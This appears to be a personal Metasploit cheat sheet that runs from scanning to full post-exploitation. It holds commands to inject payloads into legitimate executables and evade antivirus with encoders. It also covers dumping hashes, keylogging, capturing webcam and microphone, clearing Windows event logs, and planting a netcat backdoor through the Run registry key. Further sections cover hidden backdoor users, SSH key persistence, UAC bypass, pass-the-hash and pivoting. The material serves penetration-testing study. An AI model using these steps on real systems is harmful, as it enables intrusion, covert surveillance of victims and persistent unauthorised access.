Metasploit Framework
Workspace: list all spaces
workspace -d abhi : deletes the workspace
workspace abhi : switch workspace
workspace -a abhi : create a new workspace
db: database commands
db_export -f xml -o /path/[Link] : exports all data of a workspace in
xml file
db_import /path/[Link] : import the data from that file
db_nmap -A ip : Imports Nmap scan results into the database
db_status : check the status of the database
db_report -o file : generate a report from the workspace
Normal Commands
services : shows all services scanned
hosts : show all hosts scanned
vulns : display all vulnerabilities
vulns -p 445 : for port 445 only
sessions : to view all sessions
sessions -i sessionid : go to that session
sessions -u id : upgrade the session to meterpreter
sessions -C getuid -i 1 : run a meterpreter command on a meterpreter
session with opening it
use auxiliary to scan for different result you get through the nmap to get more
accurate results you can not run nmap on an internal device which is not
connected to the internet however you can use auxiliaries on that system
through one of the exploited system on that internal network.
Metasploit Framework 1
� Under a module: use these commands under a module
show options : to get all available parameter to run the exploit
show advanced : show advanced parameters
show targets : show all targets that can be exploited
set Rhost ip : set your target
setg rport ip : globally set your target port for all modules
set payload : set a payload to execute
thread : how many thread are sent the less the less detectable the more
the more accurate
Meterpreter
help command: help of that specific command
clearev : clear all Application, System, and Security logs on a Windows
download filepath: downloads a file from the remote machine.
upload filename destination_path
edit: The edit command opens a file located on the target host. It uses the
‘vim’
getuid: gives the user
sysinfo: gives basic system info
hashdump or run post/windows/gather/hashdump : to get the hashdumps
idletime: shows for how much time the remote machine is running
ipconfig: shows all interfaces and IP
lpwd and lcd : used to check and change the local working directory
ps to check running process
ps -s : to get all system process
ps -S exe : to get all exe process, search by name
migrate: to change the running process of the meterpreter shell
Metasploit Framework 2
� resource [Link]: execute all commands written in the file at once
search : can search within the all target system at once and wildcards can
be used here
shell : gives a shell of the target
webcam_list : shows all current webcams running on target
webcam_snap : grabs a snapshot from the webcam
webcam_steam : live stream
getsystem : get the system privilege
record_mic : record audio from default microphone
screenshare and screenshot
run autoroute -s [Link]: let us run any module on any device on
the internal network of which we have exploited a machine. Enter the
internal network subnet or IP of the exploited system on the internal
network here
checksum md5 /bin/bash : get the md5 hash of bin bash shell
Msfvenom
msfvenom - -list payloads
msfvenom - -list formats : all output formats
-a x64 : architecture
-p windows/meterpreter/reverce_tcp: payloads
LHOST , LPORT
-f exe >[Link] : filetype
-f elf : for linux
-e x86/shikata_ga_nai : encoders
-i 10 : will increase the no of interactions of the encoder
Metasploit Framework 3
� -x [Link] : inject the payload in a legitimate executable
-k : just after the -f function and before -x to maintain the actual
functionality of the injected payload
python -m SimpleHTTPServer 80 : starts a simple HTTP server (change to
[Link] for python3)
msfconsole -r [Link] : load a resource script (write commands you will type
in the msfconsole in sequential order)
or type resource [Link] in the console
makerc [Link] : make a resource script of the tasks you have done on the
session
Modules
Auxiliaries
scanner/portscan/tcp or syn : normal port scan
udp_sweep: normal udp scan
ftp
Ftp_login: brute force on FTP
ftp_version: check FTP version
ftp/anonymous : to check FTP anonymous login
ftp IP: this will prompt you to username and pass
smb
smb_version : normal version check
smb_enumusers: enumerate users on the target system
smb_enumshares : check shares on the target system via SAM RPC
service
smb_login : brute force
smb/psexec : metasploit
smbclient -L “\\\\<ip>\\” : check for anonymous login
Metasploit Framework 4
� smbclient -L “\\\\<ip>\\Share”: check for login for a specific share
smbclient -L <IP> -U <username>: to connect to the target using smb
enum4linux -u <username> -p <password> -U <ip_address>
can use [Link] also : [Link] <USER>@<TARGET_IP> [Link]
Web server
http_version
http_header : HTTP header detection (can specify the HTTP method if
it is GET)
[Link] file is a file stored at the root of the web server that prevents
search engines from indexing specific web directories
robots_txt
http_options: to get the http methods allowed
http_put : check on all the directories and check which one allows
uploading a file or putting a file
dir_scanner : to scan web directories
files_dir : searches interesting files on the HTTP server
if there is apache/php server always check phpinfo for more
information ( If it is lower than 5.3.1 it is vulnerable to command
injection attack ( search php cgi) )
apache_userdir_enum : to get the users on the server
http_login : brute force on an authentication form on the
site(userfile=[Link] passfile=unix_passwords.txt)
davtest -url [Link] -auth user:password : gives u
the information of what files can be uploaded to the server and what
file cant
cadaver [Link] : used to upload a file on webDAV
directory
Apache Tomcat : tomcat_mgr_login
Metasploit Framework 5
� MySQL
mysql_version : check version
mysql_login : brute force
mysql_enum: requires credential to run this module
mysql_sql : req creds, can execute a SQL query
mysql_schemadump : shows databases and tables
mysql -h <ip_address> -u <username> -p <password> : connect to
the MySQL server
ssh
ssh_version
ssh_login
ssh_enumusers
smtp
smtp_version
smtp_enum : user enumuration , attack on service account if found
WinRM
winrm_auth_methods : check supported auth methods
winrm_login : brute force
winrm_cmd : run windows command with username and password
plugins
download auto_pwn from github and move it to /usr/share/metasploit-
framework/plugins then run command “load db_autopwn” in the msf
terminal then type db_autopwn -t -p -PI 445: gives list of all open ports
or You can use the “analyze” command in msfconsole
wmap_sites -a <IP>: to create a site
wmap_targets -t [Link] : set the target
Metasploit Framework 6
� wmap_run -t : swho all enabled modules
wmap_run -e : run all the enables modules
run scraper : to save all the info of the current workspace to a location
Exploit
Http
Rejjeto HFS v2.3 is vulnerable to remote exec : rejjeto_hsf_exec
Apache Tomcat: tomcat_jsp_upload_bypass_check
set payload java/jsp_shell_bind_tcp
set SHELL cmd; works on any version below 10
Apache Tomcat Jsp Engine 1.1 : get the username and pass from brute
and then upload a msfvenom payload with -f war > [Link] as the
tomcat manager allows us to upload war files
certutil -urlcache -f [Link] [Link] : download a
file from a python http server on windows cmd
you can use cadaver and devtest for IIS WebDAV
Drupal7: unix/webapp/drupal_drupalgeddon2
unix/webapp/drupal_drupalgeddon
Jenkins v2.441 is also vulnerable : 2024-23897
jenkins_script_console
Xoda is also vulnerable 0.4.5 with a PHP file upload vuln
badblue and HFS vulns
WinRM
winrm_script_exec : provide username and password
ftp
vsftpd_234_backdoor : vstfpd 2.3.4 version is vuln with this backdoor
Samba
Metasploit Framework 7
� samba v3.5.0 is vulnerable remote code execution
is_known_pipename : exploit available
use command “check ” in the exploit module to check if the samba is
vulnerable or not
ssh
libssh is a multiplatform C library implementing the SSHv2
libssh v0.6.0-0.8.0 is vuln to authentication bypass vulnerability in the
libssh server code
(auxiliary)libssh_auth_bypass : scan for the service is vul or not ; set
SWAPN_PTY true = to spawn a shell
smtp
haraka is a smtp server developed in [Link], it comes with a plugin for
processing attachments
haraka below v2.8.9 are vulnerable to command injection
linux/smtp/haraka
set SRVPORT 9898 ; set email_to root@[Link]
set payload linux/x64/meterpreter_reverce_http; set lport and lhost
post
shell_to_meterpreter : upgrade meterpreter
Windows
PostEnum
migrate
win_privs : tells the current user we are logged in is an admin, user
or system or is in the admin group or not
enum_logged_on_users
checkvm: check if the target is a VM or not
enum_applications: get info about installed apps
Metasploit Framework 8
� enum_av_excluded : check if there are any excluded folders or
services that are not being scanned by the antivirus(defender)
enum_patches : get info about the patches and check if they are
vuln or not
enum_shares
Keylogging / keystroke
getdesktop : to get the different desktop on one system
migrate to [Link] to get the input from login screen
migrate to a system process which always runs like explorer
keyscan_start : start capturing all the entries done with the
keyboard
keyscan_dump : get the captured data
need to stop and start again to capture the data of the another
process
once the data is dumped it will not show that data in the next
dump
Dump Hash
migrate to lssas process
load kiwi
lsa_dump
PassTheHash with psexec process
checkvm : check if the machine is a virtual machine or not
enum_application: check running apps on the system
enum_av_excluded : check for the windows defender and firewall rules
enum_computer : to check for other computer on that domain
enum_patches : patches we can exploit
enum_shares : to check the shared drives
Metasploit Framework 9
� enable_rdp : enable rdp on the target if supported
PrivEsc
migrate, priv_migrate
win_privs : show all the privileges and show either the session is
user, admin or system
enum_logged_on_users : shows all the logged in users
enable_rdp : to enable rdp service on target
net user administrator user12 : create a user on shell
xfreerdp /u:administrator /p:user12 /v:<IP here>
Pivoting
enum_computers : get the computers on the domain if the target is
part of a domain
run autoroute -s <accessed victim IP subnet>
then you can scan the 2nd victim also using modules
portfwd add -l <LOCAL_PORT> -p <TARGET2_PORT> -r
<TARGET2_IP>(in meterpreter)
db_nmap -sS -sV -p <LOCAL_PORT> localhost(in terminal)
Rember adding a route to a meterpreter session makes the
compromised machine act as a proxy NOT a router So use bind
shells instead of reverse otherwise the server wouldn't be able to
reach you
Persistance
everytime you run the handler you will get a new meterpreter
session
Clear track
clearev
Metasploit Framework 10
� Linux
PostEnum
enum_configs: to get the configurations set up on the system
check them with the loot command in msf
env : gives the OS environment settings
enum_network : get all the network info like firewall,DNS, ssh
hostkey,etc
enum_protections : system security features are there or not . LSM,
IDPS, firewall,antivirus
check them with the notes command in msf
enum_systems : gives info about the system like
users,crons,kernel,version etc
checkcontainer : to check whether the target is a docker container
or not
enum_users_history : to get history of commands of all the users
chkrootkit : it is a linux service used to check rootkit version below
00.5.0 are vuln see if any cron is executing this script or not
linux/gather/hashdump
root can change password of itself using; passwd root
Peristence
create a backdoor user to get access to the target again and again
after the service is not exploitable any more
usermod -aG root FTP : adds the FTP to root group
groups FTP : check the group of any user
usermod -u 15 FTP : change the user id of the account so that no
one knows its the most recent user
cronjob persistence module : is quite useful but admin can easily
look it
Metasploit Framework 11
� or you can add a manual cronjab also
service_persistance : similar to windows transfer to a persistence
service and whenever the service is running we can take a
meterpreter
The only post module for persistence in linux and most undetected
one is : sshkey_persistence : this will specify a sshkey to all users
and allow remote login anytime
run loot to check the key and then copy the key
chmod 0400 sshkey_file
ssh -i sshkey_file root@<IP> : you will be logged in without any
password
Armitage
Hosts > add host/host file : to add the target host
right click on the host to get the host info,
right click > scan : perform a normal TCP scan
hosts > nmap scan : perform a nmap scan
Attacks > find attacks : to get all the possible exploit vectors
right click > logins : get here after the attack option to see potential vectors
after exploit right click > meterpreter and see various things you can do
(helpful if you don’t know commands)
Post: we will use persistence post-exploitation module to get a persistence
connection
search persistence and use manage persistent exe
in a meterpreter session write run persistence -h to see help
Using Netcat
Metasploit Framework 12
� upload /usr/share/windows-binaries/[Link] . (this dot is to specify
upload on current path)
we can run that using reg command used for registry related work
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run
-v netcat -d ‘C:\\Path\\to\\[Link] -Ldp 44444 -e C:\\path\\to\\[Link]’
netsh advfirewall firewall add rule name=’netcat’ dir=in action=allow
protocol=Tcp localport=44444 : add rule to firewall
netsh firewall show portopening : shows all firewall port rules
run the above given in a meterpreter shell
nc -nv targetip port we specified(44444)
Using RDP
it will work when no other user is logged in.
post/windows/manage/enable_rdp : you can use this module to set a
persistence connection
run getgui -e -u test -p test : it makes a user test with password test on
the target system.
you can use cleanup script to clean up this persistence connection
now after running this run rdesktop as root user to get the GUI when
the no one is logged into the system if there is someone logged in it
will ask that user to log out first
Privilege Escalation
Even if You launch as admin there are chances that your process or apps will
get executed without admin access
search for uac modules to escalate your privilages
use exploit/windows/local/ask : this is the most basic. Run this on the session
you want to escalte
we will be the same user with escalated privileges
The same can be done with exploit/local/bypassuac_eventvwr
Metasploit Framework 13
� getsystem : gives you the right to execute the processes as an admin if you
are an admin
exploit/local/service_permissions : runs your payload with same permissions
as the print spooler process run.
Pass The Hash
You can hashdump post module on a session to gather info and save in
workspace (use creds to see them)
ps exec is windows exploit to get shell via smb
set SMBuser to the username and SMBPass to the equivalent password you
get
check the hash will work or not using scanner/smb/smb_login
GREP Password == | findstr /i password
Pivoting
Use post/multi/manage/autoroute: to see the other networks in which the
target is connected and get connected to these networks also
set subnet under this post module to the subnet you want to get added in
see other interfaces using ipconfig command in the meterpreter
after this, if we set a target of the new IP range it will send all packets to that
network from our network through the opened meterpreter shell
do a port scan on that network if you find any other machine
look for its SMB, SSH or common ports if open run the version scanner
You can pass the hash on the other machine but the meterpreter will give an
error most of the time, You have to bind the meterpreter so that it works
properly
under the exploit/windows/smb/psexec , set payload
windows/meterpreter/bind_tcp
Metasploit Framework 14
� Other helpful Resources
use auxiliary/analyze/crack_ : uses john the ripper to crack a password.
set [Link] file in etc add socks4 [Link] 1080
then use /server/socks4a
proxychains [Link] ./user:pass@[Link] (first run the
module from previous step then execute this command)
Metasploit Framework 15